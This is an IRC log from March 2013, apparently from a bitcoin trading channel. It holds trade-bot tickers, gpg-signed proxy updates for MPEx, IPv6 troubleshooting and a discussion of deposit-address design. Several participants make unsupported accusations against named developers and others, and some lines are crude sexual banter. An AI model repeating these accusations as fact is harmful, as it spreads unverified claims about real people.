13 09:32:24 hax0rd Mar 13 09:32:27 its up here Mar 13 09:32:35 hey is the trollbox still there? Mar 13 09:32:47 ltc is 0.01642 cause i know you wanna know Mar 13 09:32:47 it goes on and off for me, the site. i dont see the trollbox Mar 13 09:32:55 trollbox is here Mar 13 09:33:36 i see the trollbox but on my account i cant Mar 13 09:33:37 wtf Mar 13 09:33:39 if i log in Mar 13 09:37:05 you got outtrolled Mar 13 09:43:22 whats the mpex fee nowadays? Mar 13 09:49:01 [HAVELOCK] [HIM] 2 @ 1.709999 = 3.42 BTC [+] Mar 13 09:50:01 [HAVELOCK] [HIM] 5 @ 1.71 = 8.55 BTC [+] Mar 13 09:53:01 [HAVELOCK] [HIM] 3 @ 1.745 = 5.235 BTC [+] Mar 13 09:56:43 [BTCTC] [COGNITIVE] 1 @ 0.185 BTC [+] Mar 13 09:58:07 grubles: still 30 last I heard Mar 13 09:59:51 [BTCTC] [S.DICE-PT] 10 @ 0.00579 = 0.0579 BTC [+] Mar 13 10:03:22 [BTCTC] [GSDPT] 1 @ 0.005237 BTC [-] Mar 13 10:04:07 [BTCTC] [S.DICE-PT] 1 @ 0.00579 BTC [+] Mar 13 10:05:16 [BTCTC] [S.MPOE-PT] 1 @ 0.000706 BTC [+] Mar 13 10:05:57 [BTCTC] [RSM] 1 @ 0.009 BTC [+] Mar 13 10:07:17 [BTCTC] [S.BBET-PT] 1 @ 0.00194 BTC [+] Mar 13 10:07:38 [BTCTC] [ASICMINER-PT] 9 @ 0.724994 = 6.5249 BTC [-] Mar 13 10:07:40 [BTCTC] [ASICMINER-PT] 1 @ 0.724994 BTC [-] Mar 13 10:08:43 [BTCTC] [BITVPS] 1 @ 0.00687 BTC [+] Mar 13 10:10:48 [BTCTC] [ASICMINER-PT] 3 @ 0.724994 = 2.175 BTC [-] Mar 13 10:12:01 [HAVELOCK] [HIM] 7 @ 1.745 = 12.215 BTC [+] Mar 13 10:12:02 [HAVELOCK] [HIM] 5 @ 1.7499 = 8.7495 BTC [+] Mar 13 10:12:03 [HAVELOCK] [HIM] 20 @ 1.75 = 35 BTC [+] Mar 13 10:14:00 [HAVELOCK] [SDICE] 1 @ 0.58699999 BTC [+] Mar 13 10:14:01 [HAVELOCK] [SDICE] 2 @ 0.587 = 1.174 BTC [+] Mar 13 10:14:03 [HAVELOCK] [SDICE] 1 @ 0.58899999 BTC [+] Mar 13 10:14:04 [HAVELOCK] [SDICE] 3 @ 0.589 = 1.767 BTC [+] Mar 13 10:26:54 h Mar 13 10:29:34 urr Mar 13 10:36:26 [BTCTC] [PAJKA.BOND] 20 @ 0.1 = 2 BTC [+] Mar 13 10:38:03 who wants to buy my mpex account Mar 13 10:38:16 0,o Mar 13 10:38:23 private key and all Mar 13 10:58:22 video of bitcointalk http://www.youtube.com/watch?v=316AzLYfAzw Mar 13 11:22:17 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [+] Mar 13 11:29:14 ;;ticker Mar 13 11:29:14 BTCUSD ticker | Best bid: 46.20301, Best ask: 46.38751, Bid-ask spread: 0.18450, Last trade: 46.20000, 24 hour volume: 72528.04121071, 24 hour low: 41.02000, 24 hour high: 46.50000, 24 hour vwap: 44.30878 Mar 13 11:43:55 jurov: around? Mar 13 11:44:09 yes Mar 13 11:46:10 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Mar 13 11:51:01 [HAVELOCK] [HIM] 18 @ 1.75 = 31.5 BTC [+] Mar 13 11:57:00 [HAVELOCK] [HIM] 2 @ 1.75 = 3.5 BTC [+] Mar 13 11:58:24 [BTCTC] [ASICMINER-PT] 1 @ 0.72499 BTC [-] Mar 13 12:07:30 [BTCTC] [ASICMINER-PT] 1 @ 0.72499 BTC [-] Mar 13 12:08:17 when is asicminer gon be worth 1btc? Mar 13 12:08:18 heh Mar 13 12:09:29 sooner than litecoin? Mar 13 12:09:37 dollar parity ftw Mar 13 12:33:16 [BTCTC] [GSDPT] 4 @ 0.005237 = 0.0209 BTC [-] Mar 13 12:40:23 !ticker btct asicminer-pt Mar 13 12:40:25 [BTCT:ASICMINER-PT] 1D: 0.7 / 0.72705 / 0.749 (42 shares, 30.5 BTC), 7D: 0.65 / 0.70519 / 1 (1171 shares, 825.8 BTC), 30D: 0.65 / 0.69325 / 1 (1495 shares, 1036.4 BTC) Mar 13 12:40:41 ltc going down Mar 13 12:41:06 oh no **** BEGIN LOGGING AT Wed Mar 13 14:08:44 2013 Mar 13 14:11:57 $proxies Mar 13 14:11:59 mircea_popescu: ["http://mpex.coinbr.com"] Mar 13 14:12:19 lol Mar 13 14:12:47 totally forgot lol Mar 13 14:13:19 $proxies VFfKqFB6 Mar 13 14:13:22 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Mar 13 14:13:33 hey thisbotsadministrator :D Mar 13 14:13:36 smickles ^ Mar 13 14:17:03 [HAVELOCK] [SDICE] 1 @ 0.589 BTC [+] Mar 13 14:17:19 in other news, 241`819 option contracts traded so far this month. **** BEGIN LOGGING AT Wed Mar 13 22:06:34 2013 Mar 13 22:06:57 $proxies Mar 13 22:06:58 mircea_popescu: ["http://mpex.co", "http://mpex.coinbr.com"] Mar 13 22:07:59 $vwap S.MPOE Mar 13 22:08:00 FabianB_: {u'7d': {u'cnt': u'49', u'min': u'67334', u'max': u'76718', u'vsa': u'358259971660', u'vsh': u'4790992', u'avg': u'74777.8271515'}, u'30d': {u'cnt': u'3857', u'min': u'61614', u'max': u'78628', u'vsa': u'3217577150869', u'vsh': u'46464513', u'avg': u'69248.0549806'}, u'1d': {u'cnt': u'', u'min': u'', u'max': u'', u'vsa': u'', u'vsh': u'', u'avg': u''}} Mar 13 22:08:21 !ticker m s.mpoe Mar 13 22:08:22 [MPEX:S.MPOE] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.00067334 / 0.00074777 / 0.00076718 (4790992 shares, 3,582.60 BTC), 30D: 0.00061614 / 0.00069248 / 0.00078628 (46464513 shares, 32,175.77 BTC) Mar 13 22:08:33 amazing. Mar 13 22:25:38 mircea_popescu: dat maff Mar 13 22:26:52 :p Mar 13 22:28:16 [BTCTC] [ASICMINER-PT] 190 @ 0.695 = 132.05 BTC [-] Mar 13 22:33:27 [BTCTC] [ASICMINER-PT] 2 @ 0.724 = 1.448 BTC [+] Mar 13 22:36:17 [BTCTC] [COGNITIVE] 2 @ 0.19 = 0.38 BTC [+] Mar 13 22:39:54 ;;gpg everify freenode:#bitcoin-otc:d09f12925116f3363e8eae0ec8ade9aadb4f55879fa01bada13bab03 Mar 13 22:39:55 You are now authenticated for user jurov with key 677ABD62D0AEE7D7 Mar 13 22:47:36 [MPEX] [S.MPOE] 5000 @ 0.00076706 = 3.8353 BTC [+] Mar 13 22:48:32 [MPEX] [S.DICE] 80 @ 0.00569991 = 0.456 BTC [+] Mar 13 22:48:34 [MPEX] [S.DICE] 220 @ 0.00599987 = 1.32 BTC [+] Mar 13 22:49:24 $proxies abrbm3cp Mar 13 22:49:25 jurov: ["http://mpex.co", "http://mpex.coinbr.com"] Mar 13 22:49:52 just had to try Mar 13 22:50:22 lol Mar 13 22:50:24 HAXXOER Mar 13 22:52:16 $proxies http://pastebin.com/1KXGu3vS Mar 13 22:52:17 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Mar 13 22:52:29 hallo mrbotadmin sir. error got! Mar 13 22:52:33 smickles ^ Mar 13 22:53:23 mpexbot: probably without the url part? Mar 13 22:53:29 mircea_popescu i mean Mar 13 22:53:38 that i tried last time Mar 13 22:53:42 $proxies 1KXGu3vS Mar 13 22:53:43 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Mar 13 22:53:52 $proxies pastebin.com/1KXGu3vS Mar 13 22:53:53 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Mar 13 22:54:07 not a proper json, i daresay Mar 13 22:54:12 wait Mar 13 22:54:13 fuck lol Mar 13 22:54:14 1 sec Mar 13 22:54:27 totally forgot the json part Mar 13 22:55:26 $proxies qU4hTtcP Mar 13 22:55:28 mircea_popescu: ["http://mpex.co", "http://mpex.coinbr.com"] Mar 13 22:55:33 $proxies http://pastebin.com/qU4hTtcP Mar 13 22:55:34 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Mar 13 22:55:40 ugh Mar 13 22:55:48 [BTCTC] [ASICMINER-PT] 1 @ 0.72 BTC [-] Mar 13 22:56:00 $proxies qU4hTtcP Mar 13 22:56:02 jurov: ["http://mpex.co", "http://mpex.coinbr.com"] Mar 13 22:56:06 that's valid innit ?! Mar 13 22:56:06 $proxies Mar 13 22:56:07 jurov: ["http://mpex.co", "http://mpex.coinbr.com"] Mar 13 22:56:21 yes smickles did it thus Mar 13 22:57:08 ;;slap mpexbot Mar 13 22:57:15 owww Mar 13 22:57:32 quite an innuendo we got there Mar 13 22:58:48 you think anyone inserts ak47s ? Mar 13 22:59:16 rule 34 Mar 13 22:59:28 lol Mar 13 23:00:18 everyone busy watching 22 running behind a ball with nothing happening in 90 minutes? Mar 13 23:01:04 nope. what's that, soccer ? Mar 13 23:01:15 oh, i almost forgot while watching this botsex... now that i'm authed, i receive claims from people mentioned in http://trilema.com/2013/mpex-ddosed-an-epic/ Mar 13 23:02:00 ofc, depends how they are mentioned. some are eligible for s.mpoe, others for s.bvps or f.giga.etf Mar 13 23:02:05 lmao Mar 13 23:02:26 [BTCTC] [ASICMINER-PT] 4 @ 0.72 = 2.88 BTC [-] Mar 13 23:02:48 lol Mar 13 23:02:56 [BTCTC] [ASICMINER-PT] 1 @ 0.724869 BTC [+] Mar 13 23:03:31 irc channel metric matter Mar 13 23:03:35 re 1.3 mb logfile Mar 13 23:04:22 i'm quoted in that article Mar 13 23:04:28 jurov i need my shares Mar 13 23:04:33 that's about 10-50 klod (kilolines of drama) Mar 13 23:04:50 PPS. Everyone named in this article for helping gets a block of 10`000 S.MPOE shares. Contact jurov to take possession. Mar 13 23:04:54 jcpham, s.bvps or giga? Mar 13 23:05:04 giga Mar 13 23:05:08 if that's my choice Mar 13 23:05:43 [BTCTC] [ASICMINER-PT] 1 @ 0.724869 BTC [+] Mar 13 23:05:59 sorry jcpham, you should have come some months earlier. next. Mar 13 23:06:09 w/e Mar 13 23:06:12 false advertising Mar 13 23:06:20 scammer tags Mar 13 23:06:21 scam Mar 13 23:06:23 jcpham if you read that shit... Mar 13 23:06:23 fuck Mar 13 23:06:30 dude my name is in there Mar 13 23:06:33 how many people of the total 10bn read 100k words in a week ? Mar 13 23:06:36 nad i'm super helpful Mar 13 23:06:41 totally. Mar 13 23:06:46 just a little bitter. Mar 13 23:07:00 yes. but s.bvps and f.giga.etf claims closed in October 2012 Mar 13 23:07:09 lol Mar 13 23:07:12 dude everyone who bothere to read that far into your novel should get shares Mar 13 23:07:20 i think so Mar 13 23:07:25 i read the whole thing Mar 13 23:07:26 dub yes, but some get them anally Mar 13 23:07:29 contact jurov for that too Mar 13 23:07:32 last sentence BONUS PRIZE FOR ME Mar 13 23:07:46 that is my preference anyway Mar 13 23:07:56 match made in heaven Mar 13 23:07:58 this is what i do Mar 13 23:08:00 i solve problems Mar 13 23:08:05 ASS TO ASS Mar 13 23:08:11 jennifer connely Mar 13 23:08:12 cum! cum! Mar 13 23:08:48 seriously though just add it to my bill Mar 13 23:08:51 jcpham, 10k shares of asspride will do as a consolation prize? Mar 13 23:08:54 i know you are good for it Mar 13 23:08:55 ...er... bitpride Mar 13 23:08:58 i wish to take this opportunity and thank everyone present for acting so professionally Mar 13 23:09:05 you are all buttpower rangers, just like luke. Mar 13 23:09:07 duly noted Mar 13 23:09:21 sure tshirt shares will work Mar 13 23:09:22 thank you, we work hard to maintain the standard of trolling Mar 13 23:09:25 as long as it is free Mar 13 23:09:39 without the backing of drama bitcoin might end up being useful Mar 13 23:09:43 and thus worthless. Mar 13 23:09:49 i'll trade you 10k xrp for 10,000 shares of tulips Mar 13 23:10:03 shit! i should have given out xrp Mar 13 23:10:07 cheaper than with mpoe Mar 13 23:10:23 should start an ripple hedge fund Mar 13 23:10:29 why did i not think of that! why does nobody think of ripple when they have a problem ripple could solve! o ye gods! Mar 13 23:10:43 (i r hope pigeons be reading this) Mar 13 23:12:25 who was that??? Mar 13 23:12:39 assbot. Mar 13 23:12:42 http://www.vice.com/en_uk/read/rob-rhinehart-no-longer-requires-food Mar 13 23:12:48 invest now in Soylent. Mar 13 23:13:59 mircea_popescu: did you figure it out or should I show you again :) Mar 13 23:14:16 you should totally show me agaIN Mar 13 23:15:03 sign: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com"] Mar 13 23:15:23 http://pastebin.com/qU4hTtcP Mar 13 23:15:38 and it's just the key to send to mpexbot Mar 13 23:15:45 $proxies qU4hTtcP Mar 13 23:15:46 mircea_popescu: ["http://mpex.co", "http://mpex.coinbr.com"] Mar 13 23:15:59 hmm -_- Mar 13 23:16:03 no but show me Mar 13 23:16:08 why don'tcha show me :D Mar 13 23:16:25 if that was your sig, it should've worked Mar 13 23:16:29 $proxies Mar 13 23:16:30 smickles: ["http://mpex.co", "http://mpex.coinbr.com"] Mar 13 23:16:33 da fuck do you mean if Mar 13 23:16:51 i haven't verified it :P Mar 13 23:17:09 wtf is going on here 1 sec Mar 13 23:17:52 $proxies qmLNVKpL Mar 13 23:17:53 smickles: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com"] Mar 13 23:17:56 dude Mar 13 23:18:04 for some reason gpg thinks it's a detached signature ?! Mar 13 23:18:09 hmm, maybe i had the wrong keyid for you Mar 13 23:18:16 no get a load of this Mar 13 23:18:22 i gpg --clearsign "hi". works. Mar 13 23:18:30 i gpg --clearsign that -> detached signature. Mar 13 23:18:39 so gpg says. Mar 13 23:19:00 my exact command: Mar 13 23:19:01 echo -n '["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com"]'|gpg --clearsign Mar 13 23:19:52 dude, mircea_popescu Mar 13 23:19:56 look at your paste Mar 13 23:20:06 you missed 3 leading '-' Mar 13 23:20:07 o ffs Mar 13 23:20:10 sigh. Mar 13 23:20:28 lol Mar 13 23:21:54 gpg can't get over these missing ---s? i thought that's their purpose Mar 13 23:22:22 anyway, no love for ipv6? i'm looking into it for mpex.coinbr now Mar 13 23:27:28 [BTCTC] [BASIC-MINING] 1 @ 0.345 BTC [+] Mar 13 23:30:18 http://www.bloomberg.com/video/bob-s-daily-buzzword-bitcoin-EJ04CzJbQsKJ6CqAsDI_WA.html Mar 13 23:31:01 no QE in bitcoin Mar 13 23:31:10 hm, mpex6.coinbr.com should work (ipv6 only) but someohow doesn't here Mar 13 23:31:41 jurov i talked with my provider, and allow me to quote : Mar 13 23:32:16 "The US datacenters we have dont support IPv6 or if they do it is very limited. The London DC does support IPv6 but cPanel and a lot of the other stuff on the server doesn't so those IPs they are able to give, are actually useless at this time." Mar 13 23:32:42 im like... doods, forget it, move to romania already. Mar 13 23:34:15 [BTCTC] [S.DICE-PT] 28 @ 0.00579 = 0.1621 BTC [+] Mar 13 23:37:21 we have an electrical grid that is about to shit the bed, ipv6 is not an upgrade priority Mar 13 23:37:28 lol, cPanel can't handle ipv6? Mar 13 23:37:48 can anyone confirm mpex6.coinbr.com works? looks like my tunnel is b0rkt Mar 13 23:39:21 if i were at home and not in hotel.. Mar 13 23:40:05 i can ping, i can connect. but no reply from webserver Mar 13 23:40:42 jurov: how about locally on the server? Mar 13 23:41:07 like "curl ::1" Mar 13 23:43:11 there it works. but amazon is not providing ipv6 end to end Mar 13 23:43:23 i only provides ipv6 to ipv4 loadbalancer Mar 13 23:44:36 ic Mar 13 23:45:12 i dont see it Mar 13 23:45:13 [BTCTC] [S.BBET-PT] 2 @ 0.00194 = 0.0039 BTC [+] Mar 13 23:45:30 yeah i tihnk you're really on ipv4 Mar 13 23:46:20 http://ipv6-test.com/validate.php passed, and detected nginx right Mar 13 23:48:25 bah Mar 13 23:48:39 it seems apparent we have some sort of ipv4 bridge or proxy or something in between Mar 13 23:48:49 sorry j but i won't fiddle with routes and shit Mar 13 23:50:43 heh... "mpex.co is down" , "yea i saw boss going to the closet" Mar 13 23:51:27 lolwut ?! Mar 13 23:52:31 theres somethign called a chain block Mar 13 23:52:50 its essentially maff and fings Mar 13 23:53:18 i got confirmed it works.. so it's just my ipv6 tunnel Mar 13 23:53:27 so you can add it Mar 13 23:55:14 [BTCTC] [PAJKA.BOND] 29 @ 0.1 = 2.9 BTC [+] Mar 13 23:55:58 https://bitcointalk.org/index.php?topic=152027.msg1621729#msg1621729 Mar 13 23:56:07 incidentally, anyone has quick proof against point 1 there ? Mar 13 23:58:09 this? 1) Without producing zero-day exploits Mar 13 23:58:31 I'm not sure this is getting through the fog of their own farts, but the group of power rangers has so far: Mar 13 23:58:31 1. Not produced one single brilliant solution to any actual problem. Mar 13 23:58:33 no proof. just that 0day happens independently from spec Mar 14 00:00:01 also, it's just software. you ever seen 100% bug free software? Mar 14 00:00:09 not me Mar 14 00:00:24 yes, i have. Mar 14 00:00:30 do you want to see some ? Mar 14 00:01:01 deadweasel i imagine you see mostly pretty buggy software Mar 14 00:01:15 this windows worldview is intolerable by now. Mar 14 00:01:22 "o, we just shit in the code because really, who cares" Mar 14 00:02:16 why do the girl (or/and you) insists going into such arguments? that's excellent the bait for taking the debate away from core points Mar 14 00:02:32 benkay mayhab I did, mayhab I didn't Mar 14 00:02:41 in this cause because wuille's lie needs to be excised. Mar 14 00:02:46 arguing who did or did not solve anything brilliantly or ducttape Mar 14 00:02:50 they try to maintain the client above the spec. this shall not stand. Mar 14 00:03:29 and they need to understand that they are kinda dumb. i dunno why they've not got it this far, but... Mar 14 00:03:33 it might be all the fanboism Mar 14 00:03:39 yes, spec+compliance tests. personal performance is tangential Mar 14 00:03:55 it may be tangential technically. there are significant political concerns involved here. Mar 14 00:04:00 let's just say the forum is not the github Mar 14 00:04:02 [HAVELOCK] [SDICE] 1 @ 0.57499999 BTC [+] Mar 14 00:04:22 deadweasel Mar 14 00:04:32 let me know when yo ufind a bug. Mar 14 00:05:17 how much are they paid? Mar 14 00:05:28 if i fuck a girl and she sucks at it Mar 14 00:05:43 and i tell her that and her response is that question Mar 14 00:05:50 [BTCTC] [ASICMINER-PT] 2 @ 0.7 = 1.4 BTC [-] Mar 14 00:05:52 [BTCTC] [ASICMINER-PT] 2 @ 0.7 = 1.4 BTC [-] Mar 14 00:05:54 [BTCTC] [ASICMINER-PT] 2 @ 0.695 = 1.39 BTC [-] Mar 14 00:05:57 does this make me think she was actually any better than i originally thought ? Mar 14 00:06:09 you've lost me Mar 14 00:06:32 you take a girl out, right ? Mar 14 00:06:34 i'm just curious how big the dev team is and what their budget is. Mar 14 00:06:45 ah, i read an implication there. Mar 14 00:07:02 the dev team is about six people (it does not include Luke-Jr, tho he keeps trying to pretend he's a dev) Mar 14 00:07:11 i mean, what's the objective? getting devteam to admit their process sucks? then such argument misses the objective (albeit narrowly), cause it's aimed to people, not to process Mar 14 00:07:12 they aren't paid, except for gavin, who is probably not paid anything much at all. Mar 14 00:07:32 the foundation collected about half a million dollars which that conman from ycombinator controls Mar 14 00:07:41 and will probably constitute the scamdrama of this summer. Mar 14 00:07:56 jurov the objective is to illuminate the very rotten structure of their arguments. Mar 14 00:10:51 i doubt this approach. you ought to decide whether you want to educate or get things done Mar 14 00:11:07 not conflate it together Mar 14 00:11:35 could this be extended to read "you ought to decide whether you want to run mpex, educate or get things done"? Mar 14 00:12:21 whatever. as long as you know what ur doing Mar 14 00:12:35 well, i hope i do and that's the best you can possibly get. Mar 14 00:12:52 but if those who get things done don't educate, who will ? those who don't ? we;ve seen the results of that one heh. Mar 14 00:13:20 so, it has come to this Mar 14 00:13:20 those who will be left behind will educate themselves, as usual Mar 14 00:13:34 smickles not quite so cut and dried yet, Mar 14 00:13:36 this being 3:13 pm Mar 14 00:13:42 ;D Mar 14 00:14:05 i suspect past the original shock a good chunk of them ppl are actually reasonable in the head. Mar 14 00:15:25 smickles, what? Mar 14 00:15:32 jurov: what what? Mar 14 00:15:55 that 3:13pm ... at least add the proxy, i confirmed t working via http://www.ipv6proxy.net/ , too Mar 14 00:16:08 $proxies Mar 14 00:16:09 smickles: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com"] Mar 14 00:16:36 ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com", "http://mpex6.coinbr.com"] Mar 14 00:16:53 can has ipv6 Mar 14 00:17:16 $proxies GPv6MV5E Mar 14 00:17:17 smickles: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com", "http://www.ipv6proxy.net"] Mar 14 00:17:56 wait, did i just nix one of them? Mar 14 00:18:12 oh what did i just do? Mar 14 00:18:26 lol Mar 14 00:18:31 you resolved it by proxy ? Mar 14 00:18:31 noooo ipv6proxy is just testing site Mar 14 00:18:43 one sec Mar 14 00:18:43 mpex6.coinbr.com is the business Mar 14 00:19:10 ;;ticker Mar 14 00:19:11 BTCUSD ticker | Best bid: 46.75723, Best ask: 46.95000, Bid-ask spread: 0.19277, Last trade: 46.95000, 24 hour volume: 49142.94060722, 24 hour low: 43.75080, 24 hour high: 47.29500, 24 hour vwap: 46.23022 Mar 14 00:19:19 the calm. this is impossible Mar 14 00:19:29 no 30% swings in a day ? waht sort of bitcoin is this! Mar 14 00:19:58 someone click that $1m button quickly Mar 14 00:20:22 $proxies DfwUaFTD Mar 14 00:20:23 smickles: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com", "http://www.ipv6proxy.net"] Mar 14 00:20:29 !!! Mar 14 00:20:34 facepalm Mar 14 00:20:49 smickles, why not use the list i supplied? Mar 14 00:21:10 smickles count the dashes baby Mar 14 00:21:11 $proxies Dsc5KCB9 Mar 14 00:21:12 smickles: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com", "http://mpex6.coinbr.com"] Mar 14 00:21:23 thanks! Mar 14 00:21:29 jurov: i did, i messed up by pasting just the sig Mar 14 00:21:33 :D Mar 14 00:21:34 w/o the message Mar 14 00:21:36 i feel better nao Mar 14 00:22:28 deposits flushed btw Mar 14 00:24:59 https://bitcointalk.org/index.php?topic=152498.0 Mar 14 00:25:01 ajhaha Mar 14 00:25:04 this guy lmao Mar 14 00:25:09 what does that mean? Mar 14 00:25:22 wannabe mpoe-pr, w/o the tits, w/o the spit&grit ? Mar 14 00:25:30 benkay that. Mar 14 00:26:26 what do you mean by "flushing deposits"? Mar 14 00:26:38 a. mpex deposits and withdrawals are processed manually. Mar 14 00:27:00 he throws the coins in the toilet and flushes Mar 14 00:27:02 that means a queue builds Mar 14 00:27:03 bye bye Mar 14 00:27:06 ta-daa Mar 14 00:27:08 i've always wondered why you do the deposits by hand Mar 14 00:27:23 instead of depositor-unique receipt addresses Mar 14 00:27:26 benkay there was exactly one bitcoin business unaffected by bitcoindev idiocy Mar 14 00:27:28 guess which. Mar 14 00:27:40 [BTCTC] [PAJKA.BOND] 15 @ 0.1 = 1.5 BTC [+] Mar 14 00:27:47 thats why withdrawals have been deprecated on mpex Mar 14 00:28:01 [HAVELOCK] [SDICE] 3 @ 0.57 = 1.71 BTC [-] Mar 14 00:28:02 hint : no, it wasn't those that trust them, like btc-guild. Mar 14 00:28:02 i understand withdrawals. Mar 14 00:28:14 you should understand deposits by the example i just gave. Mar 14 00:28:52 are you talking about mpex deposits into customer addresses? Mar 14 00:29:00 ... Mar 14 00:29:11 benkay: manual withdrawals protect the customer, manual deposits protect mpex (maybe) Mar 14 00:29:19 (sometimes) Mar 14 00:30:10 i don't really get why incoming funds need to be processed by hand Mar 14 00:30:40 Lol, withdrawals have been deprecated Mar 14 00:30:50 not trying to say you're doing it wrong. trying to understand why you do it the way you do. Mar 14 00:31:56 but think, benkay. version .8 comes out. the chain is split Mar 14 00:32:01 okpay gets a deposit in Mar 14 00:32:08 it is then doubplespent on the other chain Mar 14 00:32:12 the other chain inexplicably prevails Mar 14 00:32:15 okpay is out 12k Mar 14 00:32:20 >.< Mar 14 00:32:23 ug, who's brilliant idea was it to have an installation video and skip the text version Mar 14 00:32:25 thanks for thinking for me. Mar 14 00:32:31 heh. yw. Mar 14 00:33:02 smickles sounds like something godaddy would do. Mar 14 00:33:47 different question, mp: why u no do depositor-unique addresses for mpex deposits? Mar 14 00:33:50 I should do that and make a video of the text 'RTFM' with a link Mar 14 00:33:51 [BTCTC] [PAJKA.BOND] 30 @ 0.1 = 3 BTC [+] Mar 14 00:34:01 [HAVELOCK] [SDICE] 1 @ 0.575 BTC [+] Mar 14 00:34:35 benkay what would be the benefit iyo ? Mar 14 00:34:43 [MPEX] [O.BTCUSD.C490N] 9 @ 0.2 = 1.8 BTC [+] Mar 14 00:34:47 not having to identify deposits by amount. Mar 14 00:35:41 suppose evil person X makes a payment to mpex. Mar 14 00:35:42 ya but one key with large sum is way cooler! Mar 14 00:35:51 mpex later pays out to innocent person y. Mar 14 00:36:05 taint analysis idiots prosecute person y because clearly taint analysis proves he's x. Mar 14 00:36:26 [MPEX] [S.DICE] 300 @ 0.00599987 = 1.8 BTC [+] Mar 14 00:36:28 [MPEX] [S.DICE] 141 @ 0.00599987 = 0.846 BTC [+] Mar 14 00:36:32 [BTCTC] [PAJKA.BOND] 8 @ 0.1 = 0.8 BTC [+] Mar 14 00:37:01 [HAVELOCK] [HIM] 1 @ 1.75 BTC [+] Mar 14 00:37:44 all hail the romainians for protecting us from idiot juries Mar 14 00:38:08 this is just an edge example, there's tons of others just as good really. Mar 14 00:38:16 hm. Mar 14 00:38:38 testing for inbound is a few degrees of magnitude easier with fixed address Mar 14 00:38:48 so: nail me to the wall on this one, wouldja? Mar 14 00:39:00 i've been thinking about generating completely unique receipt addresses for each funding action Mar 14 00:39:18 s/completely/moderately Mar 14 00:39:24 eh Mar 14 00:39:29 how's something moderately unique ? Mar 14 00:39:43 they're all descended from the same keypair Mar 14 00:39:49 a okay Mar 14 00:39:52 quibble accepted Mar 14 00:40:08 generating new receipt addresses for each funding action Mar 14 00:40:14 mostly for convenience on the backend Mar 14 00:40:33 doesn't address blockchain forking, granted. Mar 14 00:40:45 stop worring and just explain the idea Mar 14 00:40:55 oh Mar 14 00:40:57 customer hits funding page Mar 14 00:41:00 new address generates Mar 14 00:41:02 sends funds Mar 14 00:41:09 we tie address to user account Mar 14 00:41:19 wait for confirmations on spend to new address Mar 14 00:41:24 credit account Mar 14 00:41:46 you are vulnerable to a particularly nasty dos attack Mar 14 00:41:56 i could just ask you generate addresses, bloat your wallet to 5gb Mar 14 00:42:07 *nod* Mar 14 00:42:10 as we know, devteam hasn't mastered the mysteries of configuring berkley Mar 14 00:42:24 i on the other hand haven't mastered the mysteries of spelling berkeley Mar 14 00:42:46 benkay but anyway, that's how bitbet does it. Mar 14 00:42:51 ha! you make spelling errors too! Mar 14 00:43:02 i don't think it's fundamentally evil or anything. Mar 14 00:43:22 wnrog smiglez Mar 14 00:43:30 well you limit the damage Mar 14 00:43:35 that can be caused Mar 14 00:44:01 [HAVELOCK] [SDICE] 2 @ 0.57 = 1.14 BTC [-] Mar 14 00:44:08 [BTCTC] [PAJKA.BOND] 30 @ 0.1 = 3 BTC [+] Mar 14 00:45:40 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [-] Mar 14 00:45:42 [MPEX] [O.BTCUSD.P430T] 500 @ 0.07993896 = 39.9695 BTC [-] Mar 14 00:47:44 is it necessarily true that the wallet has to bloat? Mar 14 00:47:48 can't you spend from the master key? Mar 14 00:47:53 https://bitcointalk.org/index.php?topic=152747.0 Mar 14 00:48:37 jonathan assia also says interesting things on the bitcoinx dev list Mar 14 00:48:43 the dev team effectively includes luke-jr, and a massive amount of work he has done makes it into bitcoind Mar 14 00:48:47 you have to keep the privkeys of all adresses you receive btc in Mar 14 00:48:51 for as long as you keep the btc there Mar 14 00:48:54 dont people tend to generate a lot of addresses in advance fot his type of thing? Mar 14 00:49:02 midnightmagic may i direct you to bitcoin.orgh Mar 14 00:49:07 dub yes. Mar 14 00:49:42 ah, so that's how it works today. Mar 14 00:49:46 mircea_popescu: Whatever it says there is irrelevant if a huge amount of his work makes it into the codebase. Mar 14 00:49:59 what i really want is bip0032 addresses Mar 14 00:50:10 midnightmagic listen up : you folks don't get to change things just by power of friendship which is magic. Mar 14 00:50:24 lukejr would love to be a developer, but he's mostly a useless contributor. Mar 14 00:50:24 mircea_popescu: I have no idea what you're talking about now. Mar 14 00:50:31 that's ok, it comes in time. Mar 14 00:50:35 most people need about six months. Mar 14 00:50:41 even the stuff he does that doesn't make it in provides backdrop for the stuff that does. Mar 14 00:50:56 his overall impact on bitcoin is net negative. Mar 14 00:51:09 mircea_popescu: Have you considered the possibility that he himself is not interested in being listed on bitcoin.org ? Mar 14 00:51:10 and if you don't like hearing it from me, ask gavin. Mar 14 00:52:43 kakobrekla pretty cool. Mar 14 00:52:57 https://bitcointalk.org/index.php?topic=152498.msg1621918#msg1621918 still repeating the "unfunded opensource project" mantra Mar 14 00:53:01 [HAVELOCK] [SDICE] 2 @ 0.565 = 1.13 BTC [-] Mar 14 00:53:31 heh. Mar 14 00:53:42 "give us more money so coinlab can float it on top of whatever it gets from users" Mar 14 00:53:52 "but we can't finance anything useful because bitcoin" Mar 14 00:54:31 anyway, i wouldn't deign jgarzik's crossposted crap with much attention. Mar 14 00:54:40 he wants to talk, he'd better sit his sweet ass down and talk. Mar 14 00:54:52 this posturing and delusions of self importance will simply bring them more asskicking. Mar 14 00:55:01 [HAVELOCK] [SDICE] 2 @ 0.56 = 1.12 BTC 